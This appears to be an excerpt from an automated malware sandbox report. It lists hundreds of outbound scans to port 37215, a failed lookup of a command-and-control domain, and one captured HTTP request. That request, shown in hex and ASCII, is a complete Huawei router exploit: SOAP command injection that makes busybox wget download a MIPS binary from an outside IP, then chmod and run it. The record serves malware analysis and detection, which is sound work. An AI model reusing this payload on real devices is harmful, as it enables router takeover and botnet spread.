Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.18.229.184:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.51.220.244:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.28.7.33:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.5.163.61:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.80.27.97:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.167.22.73:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.91.0.30:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.234.109.61:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.78.145.192:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.214.151.97:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.121.181.199:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.87.182.231:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.177.236.243:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.64.63.156:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.220.0.217:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.251.58.237:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.153.172.137:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.107.251.41:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.14.186.139:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.250.255.4:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.54.105.52:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.195.101.19:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.233.128.87:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.246.41.63:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.32.239.105:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.120.163.122:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.193.195.238:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.94.234.84:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.36.59.61:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.128.247.194:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.0.175.159:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.231.16.152:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.47.48.96:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.191.214.62:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.195.108.105:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.119.85.208:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.146.38.19:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.0.180.76:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.127.133.128:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.214.129.43:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.198.236.8:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.94.22.181:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.205.130.81:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.156.147.118:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.197.218.248:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.0.150.216:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.25.118.6:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.178.164.51:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.90.75.78:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.84.170.24:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.78.193.233:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.127.245.154:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.226.244.132:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.170.107.170:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.177.73.39:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.157.188.245:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.70.30.254:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.46.158.233:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.142.249.72:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.37.152.17:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.38.42.225:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.226.183.139:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.14.243.65:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.115.15.218:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.198.86.58:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.235.58.207:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.91.70.82:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.192.47.125:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.17.31.64:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.227.195.186:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.201.225.14:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.6.174.70:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.247.102.42:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.226.199.127:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.234.187.242:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.105.162.118:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.215.133.94:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.210.221.226:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.159.22.146:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.7.87.167:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.95.248.185:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.95.250.79:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.96.236.155:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.89.186.207:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.55.210.219:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.228.102.132:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.221.233.145:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.252.120.199:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.20.20.216:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.188.166.223:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.56.161.21:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.27.214.159:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.92.5.213:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.198.42.155:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.180.109.74:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.195.117.12:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.135.17.1:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.41.249.105:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.100.14.37:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.109.152.187:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.153.132.0:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.205.150.140:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.248.202.176:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.186.33.170:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.115.147.238:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.28.66.238:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.42.121.119:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.229.174.112:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.174.215.229:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.2.110.204:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.220.125.210:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.5.231.204:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.17.36.234:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.212.252.76:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.57.131.200:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.4.243.163:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.177.63.216:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.214.20.39:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.194.222.89:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.149.100.201:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.195.65.193:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.179.16.99:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.86.173.69:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.102.204.37:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.4.139.160:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.181.135.231:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.250.216.106:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.20.27.150:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.206.202.150:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.79.193.24:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.62.30.228:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.143.202.66:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.80.232.20:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.17.81.65:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.34.247.149:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.204.135.18:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.27.187.63:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.190.46.106:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.244.8.231:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.67.200.188:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.221.176.32:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.230.32.78:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.246.241.112:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.207.237.182:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.251.253.213:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.87.35.45:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.105.188.64:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.125.129.28:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.145.255.203:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.156.69.203:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.164.152.98:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.75.229.196:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.240.99.60:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.122.110.201:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.234.181.58:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.141.170.11:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.34.110.41:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.53.139.228:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.223.29.246:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.128.173.233:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.188.161.234:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.94.189.110:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.54.124.42:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.166.115.88:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.59.169.149:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.247.58.98:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.152.197.246:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.9.84.4:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.134.7.227:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.115.56.30:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.204.39.53:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.136.184.124:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.154.249.79:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.176.213.201:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.99.94.182:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.98.85.211:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.121.48.14:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.104.84.136:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.53.234.211:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.117.142.121:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.230.52.11:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.224.66.88:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.53.25.147:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.61.145.139:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.200.99.233:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.192.81.130:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.102.99.124:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.121.192.70:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.229.118.177:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.87.7.23:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.197.10.16:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.184.3.133:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.72.213.102:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.196.71.51:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.42.48.240:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.47.200.90:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.252.67.162:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.186.239.52:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.67.89.161:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.63.211.211:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.81.198.42:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.46.126.122:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.2.250.222:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.97.222.0:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.159.223.46:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.193.137.250:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.255.231.70:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.100.49.236:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.19.207.13:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.125.39.53:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.83.133.54:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.178.101.32:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.123.251.28:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.66.234.166:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.228.207.136:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.41.122.236:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.46.157.101:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.192.17.164:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.71.244.159:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.168.85.11:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.100.131.92:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.67.194.81:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.31.183.230:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.189.123.148:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.217.235.67:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.234.95.218:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.215.100.200:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.11.194.131:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.237.38.213:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.133.198.8:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.63.38.96:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.176.32.214:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.251.139.216:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.10.115.40:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.63.32.55:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.179.83.89:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.190.165.9:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.181.44.83:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.83.193.184:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.186.216.67:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.16.130.81:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.207.206.191:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.67.41.157:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.231.111.126:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.18.125.123:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.150.10.244:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.1.102.229:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.74.200.88:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.76.56.82:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.197.173.2:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.138.117.254:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.125.198.73:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.34.54.87:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.147.186.204:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.208.230.230:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.106.155.230:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.232.45.106:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.83.22.80:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.236.42.216:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.142.199.148:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.114.217.184:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.126.219.8:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.83.215.244:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.124.255.79:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.187.233.9:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.244.189.116:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.175.75.99:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.210.83.247:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.13.237.69:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.181.197.151:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.182.228.153:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.19.1.20:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.148.164.65:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.166.129.16:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.27.25.78:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.13.236.247:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.28.62.23:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.118.18.241:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.191.19.89:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.166.20.157:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.111.3.173:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.35.21.18:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.66.63.217:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.187.181.153:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.222.78.191:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.144.13.206:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.136.53.252:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.26.96.70:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.176.244.180:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.24.101.9:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.218.53.207:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.166.176.247:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.237.187.20:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.34.97.9:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.203.14.200:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.145.179.209:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.14.177.36:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.86.68.251:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.151.231.67:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.74.32.198:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.183.181.76:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.165.18.242:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.150.156.240:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.74.234.113:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.154.71.165:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.253.38.133:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.78.31.175:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.197.47.72:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.74.22.52:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.185.210.177:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.120.123.148:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.22.168.118:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.7.121.50:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.170.157.163:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.102.154.85:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.25.14.11:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.120.112.113:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.170.239.230:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.79.78.50:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.250.26.33:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.250.77.80:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.67.54.200:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.181.209.237:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.223.46.60:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.88.218.241:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.252.78.157:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.151.239.93:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.230.75.199:37215
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: cnc.luxstresser.xyz replaycode: Name error (3)
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
